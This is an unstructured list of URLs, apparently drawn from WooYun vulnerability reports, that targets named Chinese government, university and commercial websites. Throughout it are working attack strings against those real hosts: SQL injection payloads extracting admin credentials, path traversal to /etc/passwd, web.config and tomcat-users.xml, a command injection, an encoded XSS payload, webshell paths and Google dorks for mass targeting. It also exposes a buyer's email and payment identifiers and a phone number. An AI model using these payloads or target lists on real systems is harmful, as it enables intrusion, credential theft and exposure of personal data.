http://movie.weibo.com/movie/web/category http://cpos168.com/Service.asmx/TryLogin http://223.87.12.196/pages/index.php?action=suc 
http://223.87.12.197/pages/index.php?action=suc mail.zto.cn/register.php http://promo.unionpay.com/globalfiesta/index/showdetail/ http://180.168.124.135/ www.rzrsrc.com http://www.ccf.org.cn/sites/ccf/ieeelb.jsp http://211.151.94.148/athlete/user/control.jsp?action1=viewAthlete&bh=2009010537 http://mmbox.myuni.com.cn/portalWeb/downloadservlet?downloadname=20150104/../../../../../../../../etc/passwd&TELPHONENUM=8618611881111&fujianFlag=true http://www.52mf.com.cn/index.php/apartment/appointment/index/id/4/ http://******* http://180.96.39.133:8000/ inurl:Article_Print.asp?ArticleID= http://www.dct.com.cn/Article_Print.asp?ArticleID=745 http://www.dct.com.cn/Announce.asp?ChannelID=1 http://www.wzqjks.com/Article_Print.asp?ArticleID=504 http://www.wzqjks.com/fkggzs/Announce.asp?ChannelID=1 http://www.lishou.com/dl/Article_Print.asp?ArticleID=3925 http://www.lishou.com/dl/Announce.asp?ChannelID=1 http://www.jt8421.com/Article_Class.asp?ClassID=2 http://www.jt8421.com/Announce.asp?ChannelID=1 http://www.jhsyzx.com/gms/Article_Print.asp?ArticleID=1855 http://www.jhsyzx.com/gms/Announce.asp?ChannelID=1 http://m.juhe.cn http://m.juhe.cn/data/index http://es.fesco.com.cn/hlr/lostpass.aspx www.fenfentong.com.cn/exchange_local_list.action http://www.21315.com/ http://credit.21315.com.cn/sysadmin/login.html http://appdownload.unionpay.com/hitdownload.php https://bioinfo-mml.sjtu.edu.cn/xwnr.php?newsID=-3090%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%28name,0x3a,password%29,NULL%20from%20admin# http://www.gxczzx.gov.cn/cm_list.php?q=22 http://218.78.217.76/newAnonymousComplaint.json http://210.14.147.144:8080/login.action http://210.14.147.145:8080/login.action http://60.191.38.57/ http://www.bjjy.gov.cn/cgi-bin/eduman1/doc.fcgi?U_fldDoPubType=60 http://180.153.29.44/ http://www.akqxj.com/dwgkxinxi.php?id=6 http://m.111.com.cn/question/login/ https://www.laiyifen.com/themes/laiyifen2/images/bottom_logo.png/.php http://www.laiyifen.com/liest.html/.php 
http://www.laiyifen.com/app/b2c/statics/swf/Laiyifen.swf/.php http://www.laiyifen.com/Mobile/wx.html/.php http://www.17u.com/hotel/home/mapbarhotel?cityId=1100&act=singleHotel&hotelId=7228&isShow=1&comefrom=2&numberId=0&width=280&height=190 http://ibi.hzau.edu.cn/3dmodel/work.php?m=1&jobid=%26cat+/etc/passwd%26 http://sfpt.tjufe.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config http://202.201.166.131/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://218.199.196.90/admin/down.aspx?type=notice&mc=../../../web.config http://fin.hrbnu.edu.cn/wysf/admin/down.aspx?type=notice&mc=../../../web.config http://218.104.195.23/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://jf.cqwu.net/admin/down.aspx?type=notice&mc=../../../web.config http://202.38.194.47/admin/down.aspx?type=notice&mc=../../../web.config http://wsyh.tstc.edu.cn/admin/down.aspx?type=notice&mc=../../../web.config http://218.199.48.15/wsyh/admin/down.aspx?type=notice&mc=../../../web.config http://jxyxjybxk.haoyisheng.com/signup/admin/ http://jg.tjpu.edu.cn/zftal-hrm/xtgl/login_loginpage.html http://shanxi.sinosteel.com:8888/ http://dfi.bnuz.edu.cn/college/notice.php?noticeid=103 http://dfi.bnuz.edu.cn/college/notice.php?noticeid=103 http://www.lewaimai.com/config/editemployee/xxx.html http://ibi.hzau.edu.cn/member.php?id=3 http://mux.baidu.com/ http://60.10.8.147/member/member!findPwdone.action http://121.29.220.23:8080/wf/index.action http://zd.hek.cn/login.php www.wugang.gov.cn soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetColumn soapenv:Body soapenv:Envelope www.wugang.gov.cn www.cshtz.gov.cn www.njqh.gov.cn 
www.sihong.gov.cn http://www.changde.gov.cn/jcms/services/WSReceive?wsdl http://www.cshtz.gov.cn/jcms/services/WSReceive?wsdl http://www.njqh.gov.cn/jcms/service/WSSynchronize?wsdl http://www.lg.gov.cn/jcms/service/WSSynchronize?wsdl http://gzw.zj.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sqsc.gov.cn/jcms/service/WSSynchronize?wsdl http://www.dongtai.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfgw.gov.cn/jcms/service/WSSynchronize?wsdl http://ipad.zaozhuang.gov.cn/jcms/service/WSSynchronize?wsdl http://www.taizhou.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://ggzy.jinan.gov.cn/jcms/services/WSReceive?wsdl http://www.wugang.gov.cn/jcms/services/WSReceive?wsdl http://www.gzlps.gov.cn/jcms/services/WSReceive?wsdl http://www.zpgt.gov.cn/jcms/services/WSReceive?wsdl http://www.taojiang.gov.cn/jcms/services/WSReceive?wsdl http://tz.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.huimin.gov.cn/jcms/service/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5//services/WSSynchronize?wsdl http://www.cncn.gov.cn/jcms/services/WSReceive?wsdl http://jsxy.zucc.edu.cn/jcms/services/WSReceive?wsdl http://www.gzdpc.gov.cn//jcms/services/WSReceive?wsdl http://www.ceec.net.cn/jcms/services/WSReceive?wsdl http://www.lixia.gov.cn/jcms/services/WSReceive?wsdl http://www.jinhua.gov.cn/jcms/services/WSReceive?wsdl http://zzb.10.gov.cn/jcms/services/WSReceive?wsdl http://www.ninghai.gov.cn/jcms/services/WSReceive?wsdl http://www.sihong.gov.cn/jcms/services/WSReceive?wsdl http://www.jining.gov.cn/jcms/services/WSReceive?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.zgzhijiang.gov.cn/jcms/services/WSReceive?wsdl http://www.hzgjj.gov.cn/jcms/services/WSReceive?wsdl http://anxiang.gov.cn/jcms/services/WSReceive?wsdl http://jcms.nantong.gov.cn/jcms/services/WSReceive?wsdl http://www.geta.gov.cn/jcms/services/WSReceive?wsdl http://pub.jsds.gov.cn/jcms/services/WSReceive?wsdl 
http://www.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.jc.gansu.gov.cn/jcms/services/WSReceive?wsdl http://www.nbxsws.gov.cn/jcms/services/WSReceive?wsdl http://www.jsforestry.gov.cn/jcms/services/WSReceive?wsdl http://www.lc-news.com/jcms/services/WSReceive?wsdl http://www.xinghua.gov.cn/jcms/services/WSReceive?wsdl http://autoweb.zjwst.gov.cn/jcms2.5/services/WSSynchronize?wsdl http://www.jinxiang.gov.cn/jcms/services/WSReceive?wsdl http://www.sdxm.gov.cn/jcms25/service/WSSynchronize?wsdl http://www.xwzf.gov.cn/jcms24/service/WSSynchronize?wsdl http://www.zjdpc.gov.cn/jcms/services/WSReceive?wsdl http://www.jskx.org.cn/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.jdxc.net/jcms/service/WSSynchronize?wsdl http://sfl.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://nyyey.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://edu.tcjmxx.cn/jcms/service/WSSynchronize?wsdl http://www.haiyan.gov.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://xjco.cscec.com/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/service/WSSynchronize?wsdl http://njzx.news.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.weihai.gov.cn/jcms/service/WSSynchronize?wsdl http://www.rongcheng.gov.cn/jcms/service/WSSynchronize?wsdl http://www.yidu.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tzhl.gov.cn/jcms/service/WSSynchronize?wsdl http://www.cxyx.cn/jcms/service/WSSynchronize?wsdl http://www.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.tcedu.com.cn/jcms/service/WSSynchronize?wsdl http://www.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://jiaowuchu.blcu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.yzu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.gzwd.gov.cn/jcms/services/WSReceive?wsdl http://www.sdfda.gov.cn/jcms/services/WSReceive?wsdl http://www.czzl.gov.cn/jcms/services/WSReceive?wsdl 
http://yxy.zucc.edu.cn/jcms/service/WSSynchronize?wsdl http://www.bisu.edu.cn/jcms/service/WSSynchronize?wsdl http://www.nanxun.gov.cn/jcms/services/WSReceive?wsdl http://www.sheshantravel.com/jcms/services/WSReceive?wsdl http://sha.sinotrans.com/jcms/service/WSSynchronize?wsdl http://www.lzcgq.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sinotrans-csc.com/jcms/services/WSReceive?wsdl http://fx.10.gov.cn/jcms/services/WSReceive?wsdl http://cos.sto.cn/wui/theme/ecology7/page/login.jsp?templateId=1 http://www.sqlmap.org inurl:bmtd.do http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.gygxzw.gov.cn:8066/researchinfo.do?method=queryinfo&id=1 http://www.tlsp.net/researchinfo.do?method=queryinfo&id=1 http://58.42.249.116/researchinfo.do?method=queryinfo&id=1 http://218.201.232.67:8080/researchinfo.do?method=queryinfo&id=1 http://hxasc.cn/researchinfo.do?method=queryinfo&id=1 http://jjjc.sqxz.gov.cn/researchinfo.do?method=queryinfo&id=1 http://119.1.108.246/researchinfo.do?method=queryinfo&id=1 http://58.42.241.14:6778/researchinfo.do?method=queryinfo&id=1 http://www.sinanxzfw.gov.cn/researchinfo.do?method=queryinfo&id=1 http://jc.dlxg.gov.cn/researchinfo.do?method=queryinfo&id=1 http://210.22.123.89:8083/active/wxseed_sharephone.action http://210.22.123.89:8083/active/wxseed_sharephone.action http://www.vobao.com/User/login.aspx http://mtodo.wanda.cn/ http://mtodo.wanda.cn/ServiceMobile.asmx http://mtodo.wanda.cn/ServiceMobile.asmx?op=GetUser http://www.cqpx.cc:8086/cqpxpt/recep_apply!applyStart.action http://**.**.**/zabbix/ 
http://**.**.**/zabbix/httpmon.phpapplications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://baike.sogou.com/v60793251.htm http://www.kuaiypay.com/ http://cdjiyao.com/index.php?go=product/show-43.html http://wooyun.org/bugs/wooyun-2010-072005 http://wooyun.org/bugs/wooyun-2010-071799 http://www.hyxzfw.gov.cn/search_read.asp?id=1083 http://www.wyxzfw.com/search_read.asp?id=1083 http://www.gzshebao.org/search_read.asp?id=1083 http://yeyou.mop.com/api/sys/login.ashx?cid=0.4477432502899319?pwd=e&rem=false&uid=-1 http://crm.chinapay.com/ http://crm.chinapay.com/www.rar http://www.cqldbz.gov.cn:6666/fwld/fwld_detail.jsp?id=140401001224 http://mifan.game7z.com:8080/login.jsp http://mifan.game7z.com:8080/businesses/updateBusinesses.action http://220.196.57.132/ http://220.196.57.132/xcshtitle.php?id=741 www.sfn.cn http://www.sfn.cn http://oa.998.com//weaver/weaver.email.FileDownloadLocation?fileid=1&do http://www.sqlmap.org http://220.163.43.25/vwss/www/index.jsp?o=1 http://220.163.43.25/vwss/www/index.jsp?o=1 http://volvo.wisdom-gps.com/user/login.aspx http://60.29.214.37:8866/?t=2014 www.tjbhbus.com http://px.qsjyy.com/study.action?module=listErsWithoutC.action http://m.wandaperformance.com/order/choose/ticket?performId=d0f0dbf7fa494da68e48c06646247cc8 http://220.191.210.43/hzajjqlyg-enterprise/nosecuritycheck/appEnter_createNavigationInit.xhtml?point=qy http://www.lianyuan.gov.cn/ http://www.lianyuan.gov.cn/test.rar http://www.17uty.net http://www.dfss.com.cn/manage/EditAdmin.aspx?ID=1 http://www.babymaxx.cn/order/orderItemInfoByOrderId?id=90 http://www.babymaxx.cn/order/orderItemInfoByOrderId?id=15 https://www.myrepospace.com/forums/index.php http://www.boqii.com/userinfo/User/address 
http://php.net/cached.php?f=cached.php&t=1419999608 https://github.com/php/web-php inurl:/Empl_Password_Modify.aspx http://www.hbgzgs.com/WebUI/Admin/Empl_Password_Modify.aspx http://www.hbbygs.net/WebUI/Admin/Empl_Password_Modify.aspx http://www.hbybgs.com/WebUI/Admin/Empl_Password_Modify.aspx http://www.xn--kkrw33fqsryzj.com/WebUI/admin/Empl_Password_Modify.aspx http://jjgldq.cn/WebUI/Empl_Password_Modify.aspx http://www.hbgzgs.com/WebUI/Article.aspx?MKBM_CODE=nbgl www.hbgzgs.com http://i.boqii.com/u/12227632 http://220.178.124.53:9090/hfyhpc/statistic/nosecuritycheck/loadQuarter.xhtml http://58.240.54.35/admin/loginAction.action filetype:xhtml http://www.wzsafety.gov.cn/webapp/refer/viewReferFront.xhtml?action1=3 http://www.huzsafety.gov.cn/proscenium/picManage/videoList.xhtml http://www.lwajj.gov.cn/webapp/longwView/videoList.xhtml?type=longwAqsp http://www.hsaj.gov.cn/webapp/refer/viewReferFront.xhtml?action1=3 http://www.tssafety.gov.cn/webapp/taisView/videoList.xhtml?type=taisAqsp http://www.hzxcsafety.gov.cn/webapp/appeal/viewAppealWrite.xhtml http://www.sfn.cn/order www.sfn.cn http://www.sfn.cn http://wooyun.org/bugs/wooyun-2010-068968 inurl:yzzx_cont.asp?id= http://www.21cake.com/shopadmin/index.php http://101.95.48.76/view.action?page=login.jsp http://101.95.48.76/base.action?page=WEB-INF/web.xml http://run.baidu.com/ http://whhtz.com/news.php?classid=1 http://www.teacher.com.cn/test.txt http://www.teacher.com.cn/app.txt http://www.teacher.com.cn/seo.asp http://www.teacher.com.cn/aspxspy.aspx http://www.teacher.com.cn/test.asp http://www.jdeyes.com http://pay.178.com/log.txt return_url_log:sign=c284183f5307f54f2ba3fcb0c0ae4e99&mysign=c284183f5307f54f2ba3fcb0c0ae4e99&body=充值10元&buyer_email=ssxxpp1990@vip.qq.com&buyer_id=2088002936008631&exterface=create_direct_pay_by_user&is_success=T¬ify_id=RqPnCoPT3K9%2Fvwbh3InTuv9uO54K1kwyTXvEK7F2bYNBLGY78yZKDJHpv7kDJYFHL7jB¬ify_time=2015-01-05 http://**.**.**/cpc/ 
http://112.80.15.14:8080/cpc/sysManager/indexAction!index.action http://www.chinaamc.com/gongju/fengxianceshi/csjg/index.shtml?test=java&fs= http://www.taoshu.com/user/myaddress.aspx http://**.**.**/CUST01reg/Report/ExamRegisterReportInfo.aspxID=079506_ http://**.**.**/CUST01reg/Report/ExamRegisterReportInfo.aspxID=079506 http://d.weibo.com/1075030100?pids=Pl_Core_P1MultiPic__6&cfs=920&Pl_Core_P1MultiPic__6_filter=2&ajaxpagelet=1&__ref=/1075030100&_t=FM_142051603498282 http://tdrec.youku.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://tdrec.youku.com/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://www.znmba.com/AdminManage/Default.aspx http://www.znmba.com/FckEditor/editor/filemanager/connectors/test.html http://wh.xiangtan.gov.cn/whj/hudong/szxx_hit.jsp?id=85814 http://wh.xiangtan.gov.cn/whj/hudong/szxx_hit.jsp?id= http://sqlmap.org http://wasai.360.cn/gen_inform.php http://10.108.79.189:80/&imgurl=&name=e&time=2015-1-6&weibo=1 error:http_code:0 error:http_code:404 content_length:202 image_length:202 http://www.fjipo.gov.cn/templates/download.jsp?path=/UserFiles/File/../../WEB-INF/web.xml http://www.fjipo.gov.cn/templates/download.jsp?path=/UserFiles/File/../../../../conf/tomcat-users.xml http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=(参数遍历) http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90234 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90235 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90238 http://ep.wahaha.com.cn/ep/sale/account/reimburseSheetPrt.jsp?dao_no=90239 http://mux.baidu.com http://219.239.42.73:80/c/ http://180.149.139.84/api/help.php http://180.149.139.84/api/api.php?action=info&virtualserver=fe-dpool_wb_head_pic这个api存在注入 http://125.70.9.195:8080/cdfl/ https://i.alipayobjects.com/e/201309/17IDNJfn8n.swf。比如这个页面:https://yebprod.alipay.com/yeb/purchase.htm,当然还有其他好多页面会调用,这里不一一列举了。 
http://car.yundasys.com:81/yd_khd/khd_add.php http://car.yundasys.com:81 http://sunshine.tedc.cn:8080/sunshine-1.0/mainMenu http://218.76.27.45:8062/index0.aspx http://zbtj.hyedu.net.cn/index0.aspx http://sc.zbglxt.com/ http://henan.zbglxt.com/index0.aspx http://hainan.zbglxt.com/index0.aspx http://tzgl.ynjy.cn/index0.aspx http://srm.chng.com.cn/HnSrmWebO/LogoutServlet http://www.jwc.zync.edu.cn/admin/Login.asp,接着爆管理员账号和密码; http://www.jwc.zync.edu.cn/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin http://www.jwc.zync.edu.cn/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin http://www.whhtz.com/lxwm.php?classid=48 http://www.whhtz.com/wlxs_ertong3.php?action=read&classid=&id=209 http://www.whhtz.com/news.php?action=read&classid=46&id=301 http://www.whhtz.com/jiameng.php?classid=40 http://www.whhtz.com/wlxs_ertong3.php?action=read&classid=&id=207 http://www.whhtz.com/wlxs_new_ertong2.php?classid=70 http://www.whhtz.com/news.php?action=read&classid=46&id=301” http://tjpt.my.tudou.com//resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://weirenwu.weibo.com/taskv2/?c=Cpcs.cpcsSquare&goodstype=3 http://trs.kaiyuanhotels.com/index.htm dir:/home/trs/server/apache-tomcat/webapps/ROOT/ http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://mhz.pw/game/SOP/01.php inurl:dwgkview.aspx?tname= http://60.217.72.17:7129/ckq/dwgkview.aspx?tname=北郊镇&CountryName=前草村 http://123.134.189.60:8007/ckq/dwgkview.aspx?tname=辛庄镇&CountryName=北宝台村 http://218.56.99.84:8003/ckq/dwgkview.aspx?tname=般阳路街道&CountryName=东升社区 http://222.135.109.70:8200/ckq/dwgkview.aspx?tname=泽头镇&CountryName=吴官屯村 http://218.56.40.229:8053/ckq/dwgkview.aspx?tname=城港路街道&CountryName=谢家村 http://222.134.66.54:8014/ckq/dwgkview.aspx?tname=果里镇&CountryName=后鲁村 
http://222.134.154.214:8001/ckq/dwgkview.aspx?tname=张家坡镇&CountryName=上河疃 http://218.59.205.41:8053/ckq/dwgkview.aspx?tname=高新区&CountryName=王东 http://218.25.79.219:8080/ http://218.25.79.219:8080/20144612104656.asp;.txt http://124.93.238.141:80/ http://124.93.238.141/20153106023123.asp;.txt http://www.ifengtv.com/superadmin/login.asp http://www.secoo.com/secoojimai/goodsCtrl/toAdd http://ota.pay.mobile.sina.cn/platform/wapChannel/pay/orderRequest.php?appName=%3C%69%66%72%61%6D%65%2F%73%72%63%3D%2F%2F%77%77%77%2E%77%6F%6F%79%75%6E%2E%6F%72%67%2F%2F%3E%3C%2F%69%66%72%61%6D%65%3E&msgFrom=8177&uid=3178101845&source=web&mobile=15736681404&fee=E8GtEJbuArE%3D&business_id=599&business_linkid=HrSedar5sl1LkTTc%2FfG%2BrA%3D%3D&IS_SUB=0&url=http%3A%2F%2Fota.pay.mobile.sina.cn%2Fweibo%2Fback.php%3Forder%3D2150869675 www.wooyun.org// http://115.239.248.6:28017/ http://www.focus.cn/chinacrrc/ inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin 
http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index http://168dev.com/lebishop/Category.aspx http://oa.psy123.com.cn/AllCategories.aspx http://www.huacaiye.com/Category.aspx?tid=1 http://daiba.com.cn/Category.aspx?id=9 http://hkapp.cn/EN/Category.aspx?id=10 http://54mbb.com/EN/NewsDetails.aspx?id=5 http://shop.lutoog.com/Brand.aspx?id=189 http://queengift.net/EN/Brand.aspx?id=190 http://www.snsrn.com/en/ http://www.skycastle100.com/Search.aspx?keyword=lianyiquan http://71pg.com/Category.aspx?tid=35 http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2 http://lovedou.com/en/ http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1 http://newautoch.com/NewsDetails.aspx?id=5 http://memy.cc/ http://www.thanks789.com/Brand.aspx?id=191 http://m.gzyytz.cn/ http://www.thanks789.com/Brand.aspx?id=191 http://demo.lebi.cn/ajax/Ajax_order.aspx http://hr.meizu.com 
http://www.ahlz.cn/news/news_view.aspxtypeid=1&second_typeid=1&id=16533 http://www.ahlz.cn/news/show_view.aspx?typeid=1&second_typeid=1 http://**.**.** http://**.**.** http://all.vic.sina.com.cn/200910bmw/product_show.php?id=4676 http://xxx/xxx.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 https://auth.mhz.pw/game/sop/01.php http://rsc.nankai.edu.cn/wwwroot.rar http://recruitment.nankai.edu.cn/这么慢。。。。本想测试一下的。。但是打开不是一般的慢啊。。。。还是算了吧。。。。话说南开招人,网站还那么慢。。。我也是醉了。。。 www.qrcb.cc/disp.aspx?mid=22&aid=1183 http://www.narcb.com:8888/wwwroot.zip http://www.ssrcb.com/aspcheck.asp http://www.zhaokao.net/pingjia_pic.jsp?pid=0&colid=18496 http://211.144.118.47:8080/systemadmin/jibenpeizhi.aspx google:site:db.178.com http://db.178.com/qn/search/s/na:test'&item:on&skill:on&quest:on&monster:on&npc:on&map:on&equip:on http://db.178.com/ldj/skill-list/na:test http://db.178.com/gw2/item-list/na:test'&type:Armor http://db.178.com/dota2/search/s/na:test'&item:on&hero:on&spell:on&npc:on http://portal.alog.cc/DesktopDefault.aspx?tabindex=0&tabid=972&ItemID=668 http://www.turbomail.org/ http://mail.ieds.com.cn/nicknamelogin.jsp http://mail.cttsx.com/nicknamelogin.jsp尚未被修复,依然处于直接登录状态,暗喜开始xss测试。 http://**.**.**/manage/sys/login.shtml http://221.236.79.148:7890/oa/themes/mskin/login/login.jsp http://60.217.72.17:8073/ http://218.56.40.229:8024/ http://218.56.159.98:8000/ http://221.2.156.181:8100/ http://123.134.189.60:8012/ http://123.133.64.59:8021/ http://nlw.laiwu.gov.cn/ http://221.2.149.47:8100/ http://xxx.com/WebEditor/include/upopen.aspx http://www2.zzu.edu.cn/szjy/lldj/juti.asp?id=80 http://222.177.124.35:8082/cqyfk/page/article/readArticle.action?article_id=402881f546611193014672339b460001 http://210.75.218.116:8080/mim/) http://210.75.218.118:8080/grm/) http://omp.redotapp.com intext:Powered inurl:Category.aspx http://168dev.com/lebishop/Category.aspx http://oa.psy123.com.cn/AllCategories.aspx 
http://www.huacaiye.com/Category.aspx?tid=1 http://daiba.com.cn/Category.aspx?id=9 http://hkapp.cn/EN/Category.aspx?id=10 http://54mbb.com/EN/NewsDetails.aspx?id=5 http://shop.lutoog.com/Brand.aspx?id=189 http://queengift.net/EN/Brand.aspx?id=190 http://www.snsrn.com/en/ http://www.skycastle100.com/Search.aspx?keyword=lianyiquan http://71pg.com/Category.aspx?tid=35 http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2 http://lovedou.com/en/ http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1 http://newautoch.com/NewsDetails.aspx?id=5 http://memy.cc/ http://www.thanks789.com/Brand.aspx?id=191 http://m.gzyytz.cn/ http://www.thanks789.com/Brand.aspx?id=191 http://demo.lebi.cn/ajax/Ajax_userin.aspx http://infosec.sjtu.edu.cn/PeopleDetail.asp?id=1026 http://jiwei.sjtu.edu.cn/admin/login.asp http://fun.kid.qq.com/funshop/testfunshow/ebookController/update_assets_list?campaignID=0&etclass=0&formatID=50 http://61.138.243.24/ http://61.138.243.24/jmx-console/ http://crm.itrus.com.cn/ http://crm.itrus.com.cn/pub/bgtaskreq.php?svr=1 http://crm.itrus.com.cn/background/smsstatusreport.php?ID=1 http://crm.itrus.com.cn/background/sendsms.php?ID=1 http://www.fingerage.com/ http://www.fingerage.com/admin/index.html http://222.168.57.99/20143812073858.asp;.txt http://123.127.67.38/ inurl:/ws2004/ http://www.suyaxing.com:81/ws2004/ http://www.suyaxing.com:81/ws2004/SysManage/LeaveWord http://sgtjb.com/ws2004/ http://sgtjb.com/ws2004/SysManage/LeaveWord http://www.sdjnzx.com/ws2004/ http://www.sdjnzx.com/ws2004/SysManage/Leav http://www.wuai.lwedu.sh.cn/ws2004/ http://www.wuai.lwedu.sh.cn/ws2004/SysManag http://www.yzsx.net.cn/ws2004/ http://www.yzsx.net.cn/ws2004/SysManage/Lea http://www.cgyz.net.cn//ws2004/ http://www.cgyz.net.cn//ws2004/SysManage/Le http://www.lypcc.com.cn/artcontent.php?id=20141214767 http://61.189.86.11/xw.asp;xw.jpg http://www.hutz.org.cn/ http://www.hutz.org.cn/data/mysql_error_trace.inc http://www.hutz.org.cn/tongzhan/ 
http://mss-oa.taikanglife.com/Images http://www.sunwayinfo.com.cn/ http://gpd.scstl.org/ http://sso2.dglib.cn/ http://202.120.96.47/ http://gpd.nbsti.net/ http://202.38.93.37/ http://220.178.98.37:8084/ http://202.106.33.180/ http://202.106.33.180/20142609112654.asp;.txt www.kantv.tv www.7po.com/config/config_global.php~ http://erp.titita.com//UC/User/logon?psw=1&user= http://xbxerp.snow-bear.cn//UC/User/logon?psw=1&user= http://baby.erp2.meetok.com//UC/User/logon?psw=1&user= http://meetok.com/cases.aspx,影响也不小。 https://www.travelzen.com,不知道是不是重要系统呢?貌似是国外主站 www.travelzen.com/aboutus.php www.travelzen.com/contactus.php www.travelzen.com/doChangeCurr.php www.travelzen.com/doMemberAccountProfile.php www.travelzen.com/doMemberForgotPassword.php www.travelzen.com/doMemberLogin.php www.travelzen.com/doMemberPromotion.php www.travelzen.com/doMemberRemoveTraveler.php www.travelzen.com/doMemberSignup1.php www.travelzen.com/doThirdPartyLogin.php www.travelzen.com/faq.php www.travelzen.com/include/security_img_Mem.php www.travelzen.com/mediaCenterNews.php www.travelzen.com/memberMyAccount.php www.travelzen.com/memberSignupLogin.php www.travelzen.com/orderList.php http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123&paytype= 